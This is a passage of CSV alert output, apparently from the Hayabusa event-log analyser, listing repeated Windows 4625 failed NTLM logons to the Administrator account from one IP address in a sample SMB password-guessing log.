NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
